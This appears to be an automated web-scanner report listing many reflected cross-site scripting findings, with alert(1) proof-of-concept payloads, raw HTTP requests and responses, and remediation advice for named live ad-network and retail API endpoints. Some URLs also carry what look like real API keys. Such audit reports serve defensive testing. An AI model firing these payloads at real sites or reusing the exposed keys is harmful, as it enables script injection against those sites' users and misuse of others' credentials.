The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 858b7"-alert(1)-"bb05cec5b1e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b52f8"-alert(1)-"3572e8d3978 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0678"-alert(1)-"3f00723c72b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50e14"-alert(1)-"8f6132336dd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a321c"-alert(1)-"985e8bfe21e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90478"-alert(1)-"a4ab2d20d6c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19038"-alert(1)-"34eeeccf4f1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a93ec"-alert(1)-"3555ffd6f45 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e57db"-alert(1)-"c134cc6d981 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad090"-alert(1)-"48344422a62 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7ad5"-alert(1)-"ee21b03fa02 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab5f6"-alert(1)-"516e97c6620 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2163d"-alert(1)-"47f41d3c23a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4392"-alert(1)-"ecfac324a76 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5525"-alert(1)-"4c9c6b245a8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b1be"-alert(1)-"38f00f74b60 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f518"-alert(1)-"5e391f5e27c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e8db"-alert(1)-"34400a44cf3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f41c"-alert(1)-"9daea6c72f4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56835"-alert(1)-"35529e80084 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a70a2"-alert(1)-"4d9258f54d5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8cf4"-alert(1)-"728edc0a87 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6bf2a"-alert(1)-"9bdd8378318 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6306a"-alert(1)-"90f8bc51e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18951"-alert(1)-"18895c5edbc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b5c1"-alert(1)-"efd1d275b29 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc2e6"-alert(1)-"a88223141ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbaea"-alert(1)-"eeefe3ca7cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32362"-alert(1)-"036c1a3cc14 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23685"-alert(1)-"11221a24f63 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2228"-alert(1)-"3f6a5914556 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65dbb"-alert(1)-"0eb3d0faa8f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 365e5"-alert(1)-"f04d5429c5b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5bd4d"-alert(1)-"e75f5f53 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5603a"-alert(1)-"122445a79d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8620f"-alert(1)-"fc120b5733 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20fd1"-alert(1)-"c4cad94f04 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d26a"-alert(1)-"002706296ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6761"-alert(1)-"f29ca89fea7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 104ac"-alert(1)-"0dceffe146a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9063"-alert(1)-"f157f019c33 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee42c"-alert(1)-"efc55fb88e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da2e1"-alert(1)-"09160422661 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 608bd"-alert(1)-"f66b54a0fd5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81763"-alert(1)-"1b4c8ebcd37 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c66c'%3balert(1)//7a5ab1f91b4 was submitted in the admeld_adprovider_id parameter. This input was echoed as 2c66c';alert(1)//7a5ab1f91b4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /admeld/match?admeld_user_id=64775c16-cf5b-479e-8b02-d11a229fedb4&admeld_adprovider_id=782c66c'%3balert(1)//7a5ab1f91b4&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld-match.dotomi.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/257/campusfood/728x90/campusfood_atf?t=1313102872367&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcdn2.allmenus.com.s3.amazonaws.com%2Fv50%2Fcommon%2Fstatic%2Fadvertisements.html%3Fserver%3Dwww.allmenus.com%26slot%3Dam_50_header_leaderboard%26ignore%3Dtrue&refer=http%3A%2F%2Fwww.allmenus.com%2Fny%2Fnew-york%2F297850-underground-pizza%2Finfo%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Thu, 11 Aug 2011 22:49:32 GMT
X-Name: rtb-s10
Cache-Control: max-age=0, no-store
Content-Type: text/javascript
Connection: close
Content-Length: 160
The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 456c5'%3balert(1)//640b1256e6d was submitted in the admeld_callback parameter. This input was echoed as 456c5';alert(1)//640b1256e6d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /admeld/match?admeld_user_id=64775c16-cf5b-479e-8b02-d11a229fedb4&admeld_adprovider_id=78&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match456c5'%3balert(1)//640b1256e6d HTTP/1.1
Host: admeld-match.dotomi.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/257/campusfood/728x90/campusfood_atf?t=1313102872367&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcdn2.allmenus.com.s3.amazonaws.com%2Fv50%2Fcommon%2Fstatic%2Fadvertisements.html%3Fserver%3Dwww.allmenus.com%26slot%3Dam_50_header_leaderboard%26ignore%3Dtrue&refer=http%3A%2F%2Fwww.allmenus.com%2Fny%2Fnew-york%2F297850-underground-pizza%2Finfo%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Thu, 11 Aug 2011 22:49:28 GMT
X-Name: rtb-s07
Cache-Control: max-age=0, no-store
Content-Type: text/javascript
Connection: close
Content-Length: 160
The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ffdde'-alert(1)-'de9a7a700f7 was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0848'-alert(1)-'85376933358 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1428a'%3balert(1)//b1769215d63 was submitted in the admeld_adprovider_id parameter. This input was echoed as 1428a';alert(1)//b1769215d63 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24449'%3balert(1)//0713bdddb9d was submitted in the admeld_callback parameter. This input was echoed as 24449';alert(1)//0713bdddb9d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the cc request parameter is copied into the HTML document as plain text between tags. The payload 55836<script>alert(1)</script>67f7e0a0ca5 was submitted in the cc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ag.asp?cc=55836<script>alert(1)</script>67f7e0a0ca5&source=js&ord=2653272 HTTP/1.1
Host: adsfac.us
Proxy-Connection: keep-alive
Referer: http://www.informit.com/index.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 293
Content-Type: text/html
Expires: Wed, 31 Aug 2011 17:53:41 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: FS55836%3Cscript%3Ealert%281%29%3C%2Fscript%3E67f7e0a0ca50=uid=29247451; expires=Thu, 01-Sep-2011 17:54:40 GMT; domain=.adsfac.us; path=/
Set-Cookie: FS55836%3Cscript%3Ealert%281%29%3C%2Fscript%3E67f7e0a0ca5=pctl=0&fpt=0%2C0%2C&pct%5Fdate=4260&pctm=1&FM1=1&pctc=1&FL0=1&FQ=1; expires=Fri, 30-Sep-2011 17:54:40 GMT; domain=.adsfac.us; path=/
Set-Cookie: UserID=983108392662652; expires=Fri, 30-Sep-2011 17:54:40 GMT; domain=.adsfac.us; path=/
P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT"
Date: Wed, 31 Aug 2011 17:54:41 GMT
Connection: close
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 76cc7<script>alert(1)</script>76faf0c8b84 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 18:20:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/json; charset=utf-8
Content-Length: 172
OX.AJAST.__callbacks__.callback376cc7<script>alert(1)</script>76faf0c8b84({"ZipCode":"75244","Latitude":"32.9366","Longitude":"-96.83800","DmaName":"Dallas - Fort Worth"});
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 9953f<script>alert(1)</script>8b150904b00 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 41be8<script>alert(1)</script>a2b3fb1c730 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
SDSTATIC({ "error": { "examples": [ "/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml", "/v1/products/8880044.json?apiKey=<YourApiKey> : 8880044, a ...[SNIP]... <YourApiKey> : All stores within 10 miles of the latitude 38.89 and longitude -77.03" ], "code": 400, "message": "Couldn't understand '/v141be8<script>alert(1)</script>a2b3fb1c730/products(digitalSku> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5c0e2<script>alert(1)</script>a5010c4844b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
SDSTATIC({ "error": { "examples": [ "/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml", "/v1/products/8880044.json?apiKey=<YourApiKey> : 8880044, a ...[SNIP]... <YourApiKey> : All stores within 10 miles of the latitude 38.89 and longitude -77.03" ], "code": 400, "message": "Couldn't understand '/v1/products(digitalSku>\"\"5c0e2<script>alert(1)</script>a5010c4844b&sku in(8412292,1211393,9984558,2044283,2077114,1257903))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json'", "status": "400 Bad Request" }
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload a72bd<script>alert(1)</script>f8c76327bfb was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
1.162. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903)) [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 286a6<script>alert(1)</script>220fe19ac5d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the pageSize request parameter is copied into the HTML document as plain text between tags. The payload 33863<script>alert(1)</script>d7fd7ee2f10 was submitted in the pageSize parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the show request parameter is copied into the HTML document as plain text between tags. The payload 7bf34<script>alert(1)</script>10daab6be was submitted in the show parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7c06e<script>alert(1)</script>0dcbfca45d0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
busopsLow.BTP.retLoadBTPSKUs({ "error": { "examples": [ "/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml", "/v1/products/8880044.json?apiKey=<Your ...[SNIP]... <YourApiKey> : All stores within 10 miles of the latitude 38.89 and longitude -77.03" ], "code": 400, "message": "Couldn't understand '/v17c06e<script>alert(1)</script>0dcbfca45d0/products(sku in(8412292)&(departmentId=3))?show=name,modelNumber,image,categoryPath.id,protectionPlans.sku,sku,productId,buybackPlans.sku&apiKey=enzhw37pqtq5pup8wex2x55a&callback=busopsLow.BTP.retLoad ...[SNIP]...
